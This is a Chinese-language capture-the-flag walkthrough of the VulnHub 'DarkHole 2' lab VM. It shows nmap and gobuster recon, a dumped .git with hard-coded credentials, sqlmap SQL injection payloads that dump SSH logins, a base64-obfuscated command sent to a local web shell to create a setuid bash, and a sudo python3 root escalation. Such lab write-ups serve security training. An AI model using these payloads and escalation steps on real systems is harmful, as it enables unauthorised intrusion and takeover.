Download: https://download.vulnhub.com/darkhole/darkhole_2.zip
Description
Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don't waste your time For Brute-Force
一:信息收集
netdiscover IP 探测
$ sudo netdiscover -i ens33 -r 192.168.1.171/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 50:d2:f5:7c:60:ea 2 120 Beijing Xiaomi Mobile Software Co., Ltd
192.168.1.169 08:00:27:f7:a2:b4 1 60 PCS Systemtechnik GmbH
192.168.1.238 52:96:66:d8:a6:d9 1 60 Unknown vendor
端口扫描
全端口扫描
$ sudo nmap -p- -min-rate 10000 192.168.1.169
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-28 05:25 EDT
Nmap scan report for 192.168.1.169
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:F7:A2:B4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
默认脚本和服务版本扫描
$ nmap -p22,80 -sC -sV 192.168.1.169
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-28 05:26 EDT
Nmap scan report for 192.168.1.169
Host is up (0.00057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 192.168.1.169:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: i changed login.php file for more secure
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole V2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.41 seconds
--script=vuln扫描
$ nmap -p22,80 --script=vuln 192.168.1.169
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-28 05:27 EDT
Nmap scan report for 192.168.1.169
Host is up (0.00094s latency).
PORT STATE SERVICE
22/tcp open ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /login.php: Possible admin folder
| /.git/HEAD: Git folder
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_ /style/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| http-git:
| 192.168.1.169:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: i changed login.php file for more secure
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 31.55 seconds
目录爆破
$ gobuster dir -u "http://192.168.1.169" -w /wordlist/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.169
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /wordlist/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2023/05/28 05:30:48 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 740]
/login.php (Status: 200) [Size: 1026]
/style (Status: 301) [Size: 314] [--> http://192.168.1.169/style/]
/js (Status: 301) [Size: 311] [--> http://192.168.1.169/js/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/config (Status: 301) [Size: 315] [--> http://192.168.1.169/config/]
/dashboard.php (Status: 200) [Size: 11]
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 880845 / 882244 (99.84%)
===============================================================
2023/05/28 05:31:19 Finished
===============================================================
二:GetShell
刚才在nmap扫描中看见了.git
$ ls
Desktop Documents Downloads Music Pictures Public Templates tools Videos
$ mkdir 169
$ git-dumper http://192.168.1.169/.git 169/
[-] Testing http://192.168.1.169/.git/HEAD [200]
[-] Testing http://192.168.1.169/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.1.169/.gitignore [404]
[-] Fetching http://192.168.1.169/.git/ [200]
[-] http://192.168.1.169/.gitignore responded with status code 404
[-] Fetching http://192.168.1.169/.git/config [200]
[-] Fetching http://192.168.1.169/.git/HEAD [200]
[-] Fetching http://192.168.1.169/.git/info/ [200]
[-] Fetching http://192.168.1.169/.git/hooks/ [200]
[-] Fetching http://192.168.1.169/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.1.169/.git/index [200]
[-] Fetching http://192.168.1.169/.git/info/exclude [200]
[-] Fetching http://192.168.1.169/.git/description [200]
[-] Fetching http://192.168.1.169/.git/logs/ [200]
[-] Fetching http://192.168.1.169/.git/refs/ [200]
[-] Fetching http://192.168.1.169/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.1.169/.git/objects/ [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/update.sample [200]
[-] Fetching http://192.168.1.169/.git/refs/heads/ [200]
[-] Fetching http://192.168.1.169/.git/objects/0f/ [200]
[-] Fetching http://192.168.1.169/.git/refs/tags/ [200]
[-] Fetching http://192.168.1.169/.git/objects/04/ [200]
[-] Fetching http://192.168.1.169/.git/objects/6e/ [200]
[-] Fetching http://192.168.1.169/.git/objects/09/ [200]
[-] Fetching http://192.168.1.169/.git/objects/8a/ [200]
[-] Fetching http://192.168.1.169/.git/objects/9d/ [200]
[-] Fetching http://192.168.1.169/.git/logs/HEAD [200]
[-] Fetching http://192.168.1.169/.git/objects/49/ [200]
[-] Fetching http://192.168.1.169/.git/objects/4e/ [200]
[-] Fetching http://192.168.1.169/.git/objects/7f/ [200]
[-] Fetching http://192.168.1.169/.git/objects/56/ [200]
[-] Fetching http://192.168.1.169/.git/logs/refs/ [200]
[-] Fetching http://192.168.1.169/.git/objects/66/ [200]
[-] Fetching http://192.168.1.169/.git/objects/93/ [200]
[-] Fetching http://192.168.1.169/.git/objects/59/ [200]
[-] Fetching http://192.168.1.169/.git/objects/77/ [200]
[-] Fetching http://192.168.1.169/.git/objects/8b/ [200]
[-] Fetching http://192.168.1.169/.git/objects/aa/ [200]
[-] Fetching http://192.168.1.169/.git/objects/a2/ [200]
[-] Fetching http://192.168.1.169/.git/objects/b2/ [200]
[-] Fetching http://192.168.1.169/.git/objects/a4/ [200]
[-] Fetching http://192.168.1.169/.git/objects/c1/ [200]
[-] Fetching http://192.168.1.169/.git/objects/b6/ [200]
[-] Fetching http://192.168.1.169/.git/objects/32/ [200]
[-] Fetching http://192.168.1.169/.git/objects/e6/ [200]
[-] Fetching http://192.168.1.169/.git/objects/ca/ [200]
[-] Fetching http://192.168.1.169/.git/objects/pack/ [200]
[-] Fetching http://192.168.1.169/.git/objects/c9/ [200]
[-] Fetching http://192.168.1.169/.git/refs/heads/master [200]
[-] Fetching http://192.168.1.169/.git/objects/0f/1d821f48a9cf662f285457a5ce9af6b9feb2c4 [200]
[-] Fetching http://192.168.1.169/.git/objects/info/ [200]
[-] Fetching http://192.168.1.169/.git/objects/8a/0ff67b07eb0cc9b7bed4f9094862c22cab2a7d [200]
[-] Fetching http://192.168.1.169/.git/objects/04/4d8b4fec000778de9fb27726de4f0f56edbd0e [200]
[-] Fetching http://192.168.1.169/.git/objects/7f/d95a2f170cb55fbb335a56974689f659e2c383 [200]
[-] Fetching http://192.168.1.169/.git/objects/09/04b1923584a0fb0ab31632de47c520db6a6e21 [200]
[-] Fetching http://192.168.1.169/.git/objects/49/151b46cc957717f5529d362115339d4abfe207 [200]
[-] Fetching http://192.168.1.169/.git/objects/9d/ed9bf70f1f63a852e9e4f02df7b6d325e95c67 [200]
[-] Fetching http://192.168.1.169/.git/objects/4e/b24de5b85be7cf4b2cef3f0cfc83b09a236133 [200]
[-] Fetching http://192.168.1.169/.git/objects/6e/4328f5f878ed20c0b68fc8bda2133deadc49a3 [200]
[-] Fetching http://192.168.1.169/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.1.169/.git/objects/66/5001d05a7c0b6428ce22de1ae572c54cba521d [200]
[-] Fetching http://192.168.1.169/.git/objects/aa/2a5f3aa15bb402f2b90a07d86af57436d64917 [200]
[-] Fetching http://192.168.1.169/.git/objects/93/9b9aad671e5bcde51b4b5d99b1464e2d52ceaa [200]
[-] Fetching http://192.168.1.169/.git/objects/56/987e1f75e392aae416571b38b53922c49f6e7e [200]
[-] Fetching http://192.168.1.169/.git/objects/59/218997bfb0d8012a918e43bea3e497e68248a9 [200]
[-] Fetching http://192.168.1.169/.git/objects/a4/d900a8d85e8938d3601f3cef113ee293028e10 [200]
[-] Fetching http://192.168.1.169/.git/objects/8b/6cd9032d268332de09c64cbe9efa63ace3998e [200]
[-] Fetching http://192.168.1.169/.git/objects/c1/ef127486aa47cd0b3435bca246594a43b559bb [200]
[-] Fetching http://192.168.1.169/.git/objects/77/c09cf4b905b2c537f0a02bca81c6fbf32b9c9d [200]
[-] Fetching http://192.168.1.169/.git/objects/b6/f546da0ab9a91467412383909c8edc9859a363 [200]
[-] Fetching http://192.168.1.169/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://192.168.1.169/.git/objects/32/d0928f948af8252b0200ff9cac40534bfe230b [200]
[-] Fetching http://192.168.1.169/.git/objects/c9/56989b29ad0767edc6cf3a202545927c3d1e76 [200]
[-] Fetching http://192.168.1.169/.git/objects/b2/076545503531a2e482a89b84f387e5d44d35c0 [200]
[-] Fetching http://192.168.1.169/.git/objects/ca/f37015411ad104985c7dd86373b3a347f71097 [200]
[-] Fetching http://192.168.1.169/.git/logs/refs/heads/master [200]
[-] Fetching http://192.168.1.169/.git/objects/a2/0488521df2b427246c0155570f5bfad6936c6c [200]
[-] Fetching http://192.168.1.169/.git/objects/32/580f7fb8c39cdad6a7f49839cebfe07f597bcf [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-applypatch.sample [200]
[-] Running git checkout .
Updated 14 paths from the index
找到了密码,Username:lush@admin.com Password:321
$ git log
commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date: Mon Aug 30 13:14:32 2021 +0300
i changed login.php file for more secure
commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date: Mon Aug 30 13:06:20 2021 +0300
I added login.php file with default credentials
commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date: Mon Aug 30 13:02:44 2021 +0300
First Initialize
$ git checkout a4d900a8d85e8938d3601f3cef113ee293028e10
Note: switching to 'a4d900a8d85e8938d3601f3cef113ee293028e10'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at a4d900a I added login.php file with default credentials
$ cat login.php
<?php
session_start();
require 'config/config.php';
if($_SERVER['REQUEST_METHOD'] == 'POST'){
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
$_SESSION['userid'] = 1;
header("location:dashboard.php");
die();
}
}
?>
<link rel="stylesheet" href="style/login.css">
<head>
<script src="https://kit.fontawesome.com/fe909495a1.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="Project_1.css">
<title>Home</title>
</head>
<body>
<div class="container">
<h1>👋 Welcome</h1>
<!-- <a href="file:///C:/Users/SAURABH%20SINGH/Desktop/HTML5/PROJECTS/Project%201/Project_1.html"><h1>Sign In</h1></a> -->
<!-- <a href="file:///C:/Users/SAURABH%20SINGH/Desktop/HTML5/PROJECTS/Project%201/P2.html"> <h1>Log In</h1></a> -->
<form action="" method="post">
<div class="box">
<i class="fas fa-envelope"></i>
<input type="email" name="email" id="email" placeholder="Enter Your Email" required>
</div>
<div class="box">
<i class="fas fa-key"></i>
<input type="password" name="password" id="password" placeholder="Enter Your Password" required>
</div>
<button id="btn" name="button">Login</button>
</form>
</div>
</body>
然后只有这个一个测试点了,sqlmap先跑数据库
$ sqlmap -u "http://192.168.1.169/dashboard.php?id=1" --cookie="PHPSESSID=0152jic2ivpmp8inrc0530jod2" --dbs --batch
___
__H__
___ ___[.]_____ ___ ___ {1.7.5.4#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:36:26 /2023-05-28/
[06:36:26] [INFO] testing connection to the target URL
[06:36:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[06:36:27] [INFO] testing if the target URL content is stable
[06:36:27] [INFO] target URL content is stable
[06:36:27] [INFO] testing if GET parameter 'id' is dynamic
[06:36:27] [WARNING] GET parameter 'id' does not appear to be dynamic
[06:36:27] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[06:36:27] [INFO] testing for SQL injection on GET parameter 'id'
[06:36:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:36:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[06:36:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[06:36:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:36:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[06:36:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[06:36:27] [INFO] testing 'Generic inline queries'
[06:36:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[06:36:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[06:36:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[06:36:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[06:36:37] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[06:36:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:36:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:36:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[06:36:37] [INFO] target URL appears to have 6 columns in query
[06:36:37] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))fTwN) AND 'LqHe'='LqHe
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-7994' UNION ALL SELECT NULL,CONCAT(0x71766b6b71,0x546e58506d4975694b594d624347726276485079546569505a477a55526759646b634d4f4a714b6a,0x716b6b7671),NULL,NULL,NULL,NULL-- -
---
[06:36:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[06:36:37] [INFO] fetching database names
available databases [5]:
[*] darkhole_2
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[06:36:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 27 times
[06:36:37] [INFO] fetched data logged to text files under '/home/team003/.local/share/sqlmap/output/192.168.1.169'
[*] ending @ 06:36:37 /2023-05-28/
表
$ sqlmap -u "http://192.168.1.169/dashboard.php?id=1" --cookie="PHPSESSID=0152jic2ivpmp8inrc0530jod2" -D "darkhole_2" --tables --batch
___
__H__
___ ___[,]_____ ___ ___ {1.7.5.4#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:37:35 /2023-05-28/
[06:37:35] [INFO] resuming back-end DBMS 'mysql'
[06:37:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))fTwN) AND 'LqHe'='LqHe
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-7994' UNION ALL SELECT NULL,CONCAT(0x71766b6b71,0x546e58506d4975694b594d624347726276485079546569505a477a55526759646b634d4f4a714b6a,0x716b6b7671),NULL,NULL,NULL,NULL-- -
---
[06:37:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[06:37:35] [INFO] fetching tables for database: 'darkhole_2'
Database: darkhole_2
[2 tables]
+-------+
| ssh |
| users |
+-------+
[06:37:35] [INFO] fetched data logged to text files under '/home/team003/.local/share/sqlmap/output/192.168.1.169'
[*] ending @ 06:37:35 /2023-05-28/
$ sqlmap -u "http://192.168.1.169/dashboard.php?id=1" --cookie="PHPSESSID=0152jic2ivpmp8inrc0530jod2" -D "darkhole_2" -T "ssh" --dump --batch
___
__H__
___ ___[(]_____ ___ ___ {1.7.5.4#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:38:40 /2023-05-28/
[06:38:40] [INFO] resuming back-end DBMS 'mysql'
[06:38:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))fTwN) AND 'LqHe'='LqHe
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-7994' UNION ALL SELECT NULL,CONCAT(0x71766b6b71,0x546e58506d4975694b594d624347726276485079546569505a477a55526759646b634d4f4a714b6a,0x716b6b7671),NULL,NULL,NULL,NULL-- -
---
[06:38:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[06:38:40] [INFO] fetching columns for table 'ssh' in database 'darkhole_2'
[06:38:40] [INFO] fetching entries for table 'ssh' in database 'darkhole_2'
Database: darkhole_2
Table: ssh
[1 entry]
+----+------+--------+
| id | pass | user |
+----+------+--------+
| 1 | fool | jehad |
+----+------+--------+
[06:38:40] [INFO] table 'darkhole_2.ssh' dumped to CSV file '/home/team003/.local/share/sqlmap/output/192.168.1.169/dump/darkhole_2/ssh.csv'
[06:38:40] [INFO] fetched data logged to text files under '/home/team003/.local/share/sqlmap/output/192.168.1.169'
[*] ending @ 06:38:40 /2023-05-28/
$ ssh jehad@192.168.1.169
jehad@192.168.1.169's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 28 May 2023 10:39:13 AM UTC
System load: 0.18 Processes: 198
Usage of /: 52.1% of 12.73GB Users logged in: 0
Memory usage: 19% IPv4 address for enp0s17: 192.168.1.169
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Sep 3 05:49:05 2021 from 192.168.135.128
jehad@darkhole:~$
user_flag
jehad@darkhole:/home/losy$ cat user.txt
NULLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
三:提权
使用 linpeas.sh 发现
* * * * * losy cd /opt/web && php -S localhost:9999
losy的权限,那就用bash +s 提权吧
jehad@darkhole:~$ curl "http://127.0.0.1:9999"
Parameter GET['cmd']jehad@darkhole:~$ curl "http://127.0.0.1:9999?cmd=id;whoami"
Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
losy
losyjehad@darkhole:~$
由于 + 号在url中无法使用
cp /bin/bash /tmp/bash;echo Y2htb2QgK3MgL3RtcC9iYXNo | base64 -d | bash
// 20Y2htb2QgK3MgL3RtcC9iYXNo = chmod +s /tmp/bash
jehad@darkhole:~$ curl "http://127.0.0.1:9999?cmd=cp%20/bin/bash%20/tmp/bash;echo%20Y2htb2QgK3MgL3RtcC9iYXNo%20%7C%20base64%20-d%20%7C%20bash"
Parameter GET['cmd']jehad@darkhole:~$ /tmp/bash -p
bash-5.0$ id
uid=1001(jehad) gid=1001(jehad) euid=1002(losy) egid=1002(losy) groups=1002(losy),1001(jehad)
bash-5.0$
在losy目录找到个密码
bash-5.0$ cat .bash_history
clear
exit
clear
exit
clear
exit
clear
exit
clear
ls
ls -al
ls -la
clear
exit
clear
exit
clear
exit
clear
cd ~
ls
ls -la
pwd
ssh-keygen -t rsa -b 4096
clear
chmod 777 .ssh/
cd .ssh/
chmod 666 id_rsa
clear
ls -la
clear
cd ..
ls -la
rm .ssh/
rm -r .ssh/
clear
ls -la
ssh-kyegen
exit
clear
ls -la
cd /home/losy/
clear
ls -la
rm -r .ssh/
clear
ls -la
pwd
ssh-keygen -t rsa
ls -la
ssh-keygen -t rsa
clear
chmod 777 .ssh/
cd .ssh/
chmod 666 id_rsa
php -S localhost:9999
clear
sudo su
su lama
clear
ls -la
cat /etc/crontab
su lama
mkdir web
ls -la
su lama
ls
touch index.php
cd ..
ls
ls -la
sudo su
c
clear
su lama
clear
su lama
mysql -e '\! /bin/bash'
mysql -u root -p -e '\! /bin/bash'
P0assw0rd losy:gang
clear
sudo -l
sudo python3 -c 'import os; os.system("/bin/sh")'
sudo python -c 'import os; os.system("/bin/sh")'
sudo /usr/bint/python3 -c 'import os; os.system("/bin/sh")'
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
clear
cd ~
cat .bash_history
clear
id
clear
ls -al
cd home
cd /home
ls
clear
cd jehad/
ls -la
cd ..
cd losy/
cat .bash_history
clear
ls -la
ss
cat .bash_history
clear
password:gang
然后艰难拿下root_flag
$ ssh losy@192.168.1.169
losy@192.168.1.169's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 28 May 2023 11:07:40 AM UTC
System load: 0.0 Processes: 208
Usage of /: 52.2% of 12.73GB Users logged in: 1
Memory usage: 27% IPv4 address for enp0s17: 192.168.1.169
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Sep 3 04:09:48 2021 from 192.168.135.128
losy@darkhole:~$ sudo -l
[sudo] password for losy:
Matching Defaults entries for losy on darkhole:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User losy may run the following commands on darkhole:
(root) /usr/bin/python3
losy@darkhole:~$ sudo /usr/bin/python3
Python 3.8.10 (default, Jun 2 2021, 10:49:15)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
root@darkhole:/home/losy# id
uid=0(root) gid=0(root) groups=0(root)
root@darkhole:/home/losy# cd /root
root@darkhole:~# ls
root.txt snap
root@darkhole:~# cat root.txt
NULLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
root@darkhole:~#
